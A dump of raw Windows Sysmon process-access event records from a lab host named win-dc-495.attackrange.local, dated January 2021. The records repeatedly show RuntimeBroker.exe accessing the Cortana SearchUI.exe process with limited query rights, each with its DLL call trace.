13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 